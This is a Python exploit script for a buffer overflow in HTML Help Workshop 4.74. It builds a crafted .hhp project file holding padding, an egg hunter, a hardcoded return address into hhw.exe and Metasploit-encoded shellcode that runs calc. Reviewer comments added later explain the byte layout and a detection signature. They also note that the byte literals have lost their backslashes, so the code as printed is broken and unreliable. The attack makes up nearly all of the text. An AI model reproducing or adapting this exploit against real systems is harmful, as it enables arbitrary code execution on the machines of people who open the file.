
# Title : HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# Published : 2009-12-05
# Author : Encrypt3d.M!Nd


#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
#     http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SKD's exploit on Win 7 and it didn't work. I think it's a
# Shellhunter compatibility problem, so I wrote this one and used the egg-hunting
# method. It takes some time to execute the shellcode, but it will run ;-)
#
#    Tested on : Windows xp sp3
#                Windows 7 ultimate
#



# Proof-of-concept file generator: writes one .hhp project file (Devil.hhp)
# made of an oversized "Index file=" value, an egg hunter and a Metasploit
# windows/exec (calc) payload. Nothing is executed by this script; it only
# produces the file on disk.
#
# NOTE(review): every byte literal below is printed as `xNN` with no leading
# backslash. This looks like an extraction artefact (the `\` dropped when the
# page was captured); as listed, Python writes the literal ASCII text
# "x5Bx4F..." rather than the byte values the author intended.
#
# Reading the intended bytes of hhp_data1 gives the hhp header
#   "[OPTIONS]\r\nContents file=A\r\nIndex file="
# so the 224-byte filler that follows (overflow1) sits in the "Index file"
# field. From a detection standpoint, an .hhp whose "Index file=" value runs
# to hundreds of bytes of one repeated character is the obvious static
# signature of this family of crafted project files.
hhp_data1 =("x5Bx4Fx50x54x49x4Fx4Ex53"
	    "x5Dx0Dx0Ax43x6Fx6Ex74x65"
            "x6Ex74x73x20x66x69x6Cx65"
            "x3Dx41x0Dx0Ax49x6Ex64x65"
	    "x78x20x66x69x6Cx65x3D")

# "\r\n" -- line terminator placed between the hhp sections below.
crlf      =("x0dx0a")

# "[FILES]\r" -- the section header written immediately before the payload.
hhp_data2 =("x5Bx46x49x4Cx45x53x5Dx0D")

# Egg hunter (32 bytes as intended). The bytes x69x72x61x71 ("iraq") embedded
# in it are the tag it searches for; the same tag is prepended to the
# shellcode string further down.
eggh= ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x69x72x61x71x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

# 224 bytes of padding. Together with eggh (32) and overflow2 (24), 280 bytes
# precede `ret`, so `ret` lands at offset 280 from the start of the
# "Index file" value -- presumably the saved return address on the builds the
# author tested (Windows XP SP3 / Windows 7); not verified here.
overflow1= "x41" * 224


# The payload string opens with the filename "Devil_inside.htm" and then the
# egg tag "iraq" twice (x69x72x61x71 x69x72x61x71), which is what eggh scans
# for; the Metasploit-encoded windows/exec (CMD=calc) bytes follow.
shellcode = "Devil_inside.htm"
shellcode+= "x69x72x61x71x69x72x61x71"
#
# windows/exec - 454 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=thread, CMD=calc
#
shellcode+=(
"x89xe5xdaxd6xd9x75xf4x5bx53x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x49x6cx4bx58x4cx49x47x70x47x70x43x30x45x30x4b"
"x39x4bx55x44x71x4ax72x51x74x4cx4bx50x52x44x70"
"x4cx4bx43x62x46x6cx4ex6bx42x72x47x64x4ex6bx42"
"x52x46x48x44x4fx4fx47x51x5ax45x76x50x31x4bx4f"
"x45x61x49x50x4ex4cx47x4cx45x31x51x6cx43x32x44"
"x6cx45x70x4ax61x4ax6fx46x6dx47x71x48x47x48x62"
"x48x70x46x32x50x57x4ex6bx51x42x42x30x4ex6bx42"
"x62x47x4cx43x31x4ex30x4cx4bx47x30x42x58x4dx55"
"x4fx30x44x34x42x6ax46x61x4ax70x42x70x4ex6bx42"
"x68x44x58x4cx4bx43x68x51x30x43x31x4ex33x49x73"
"x47x4cx42x69x4cx4bx45x64x4ex6bx46x61x4bx66x50"
"x31x49x6fx44x71x4fx30x4ex4cx4fx31x4ax6fx44x4d"
"x46x61x4fx37x46x58x4bx50x51x65x49x64x44x43x43"
"x4dx48x78x47x4bx43x4dx46x44x43x45x49x72x51x48"
"x4cx4bx46x38x51x34x47x71x4ax73x51x76x4ex6bx44"
"x4cx42x6bx4ex6bx43x68x45x4cx43x31x4bx63x4ex6b"
"x45x54x4cx4bx45x51x4ex30x4fx79x51x54x44x64x51"
"x34x51x4bx51x4bx51x71x42x79x43x6ax42x71x49x6f"
"x4dx30x51x48x51x4fx43x6ax4cx4bx44x52x48x6bx4c"
"x46x51x4dx43x5ax47x71x4cx4dx4cx45x4ex59x45x50"
"x43x30x43x30x46x30x51x78x50x31x4ex6bx42x4fx4c"
"x47x4bx4fx48x55x4fx4bx4dx30x47x6dx44x6ax47x7a"
"x50x68x49x36x4fx65x4fx4dx4dx4dx4bx4fx4ex35x47"
"x4cx44x46x43x4cx47x7ax4bx30x49x6bx4dx30x43x45"
"x43x35x4dx6bx43x77x45x43x42x52x42x4fx42x4ax43"
"x30x43x63x4bx4fx4ex35x50x63x51x71x50x6cx45x33"
"x45x50x41x41")

# 24 bytes of padding between the egg hunter and the return address.
overflow2= "x42" * 24
# NOTE(review): 0x00401f93 is a fixed address inside hhw.exe ("Call Edi" per
# the author). Relying on it assumes hhw.exe loads at the same base on every
# host -- the "universal" the author questions below; not verified here.
ret = ("x93x1fx40x00") # Call Edi - hhw.exe (universal huh?)

# Write the file: header, padding, egg hunter, padding, return address, two
# blank lines, "[FILES]" section, the payload string and a trailing run of
# filler.
# NOTE(review): `file` shadows the builtin and is not closed if write() raises;
# a `with open(...)` block would be the idiomatic form. As listed, "x41" * 4000
# is the 3-character string "x41" repeated 4000 times (12000 characters), not
# 4000 bytes.
file=open('Devil.hhp','w')
file.write(hhp_data1+overflow1+eggh+overflow2+ret+crlf+crlf+hhp_data2+crlf+shellcode+"x41"
* 4000)
file.close()